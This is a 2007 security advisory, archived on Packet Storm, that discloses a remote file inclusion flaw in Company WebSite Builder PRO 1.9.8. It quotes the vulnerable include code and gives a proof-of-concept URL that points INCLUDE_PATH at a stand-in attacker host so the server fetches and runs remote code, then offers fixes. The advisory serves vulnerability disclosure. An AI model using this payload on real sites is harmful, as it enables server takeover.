exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Echo Security Advisory 2007.76

Echo Security Advisory 2007.76
Posted Mar 20, 2007
Authored by Echo Security, Dedi Dwianto | Site advisories.echo.or.id

Company WebSite Builder PRO version 1.9.8 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, file inclusion
SHA-256 | 5f8e67c138e27d9f4d5526ec56537236d015c282bf8760df52e098b9b8f2db7e

Echo Security Advisory 2007.76

Change Mirror Download
____________________   ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_76$2007

--------------------------------------------------------------------------------------------
[ECHO_ADV_76$2007] Company WebSite Builder PRO (INCLUDE_PATH) Remote File Inclusion Vulnerability
--------------------------------------------- ----------------------------------------------

Author : Dedi Dwianto a.k.a the_day
Date Found : March, 15th 2007
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv76-theday-2007.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~

Application : Company WebSite Builder PRO ( CWB )
version : 1.9.8
URL : http://www.grafxsoftware.com/

This software makes it easy to build an e-commerce site that processes credit cards,
wire transfers. This is a great Content Management System that's easy to install and use WITHOUT having
to FTP upload pages every time they need to be updated.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

- Invalid include function at comanda.php
-----------------------comanda.php------------

<?
...
include($INCLUDE_LANGUAGE_PATH."$LANG.inc.php");
include($INCLUDE_PATH."connection.php");
include_once($INCLUDE_PATH."connection.php");
include_once($INCLUDE_PATH."cls_produs.php");
include_once($INCLUDE_PATH."cls_left_menu.php");
include_once($INCLUDE_PATH."cls_stire.php");
include_once($INCLUDE_PATH."cls_orders.php");
include_once($INCLUDE_PATH."cls_headline_prod.php");
include_once($INCLUDE_PATH."cls_checkout.php");
include_once("cls_download_products.php");
....
?>
----------------------------------------------------------

Input passed to the "$INCLUDE_PATH" parameter in comanda.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~

http://localhost/cwb/comanda.php?INCLUDE_PATH=http://atacker.com/inject.txt?


Solution:
~~~

- Sanitize variable $INCLUDE_PATH affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
EcHo Research & Development Center
http://advisories.echo.or.id
erdc[at]echo[dot]or[dot]id
the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close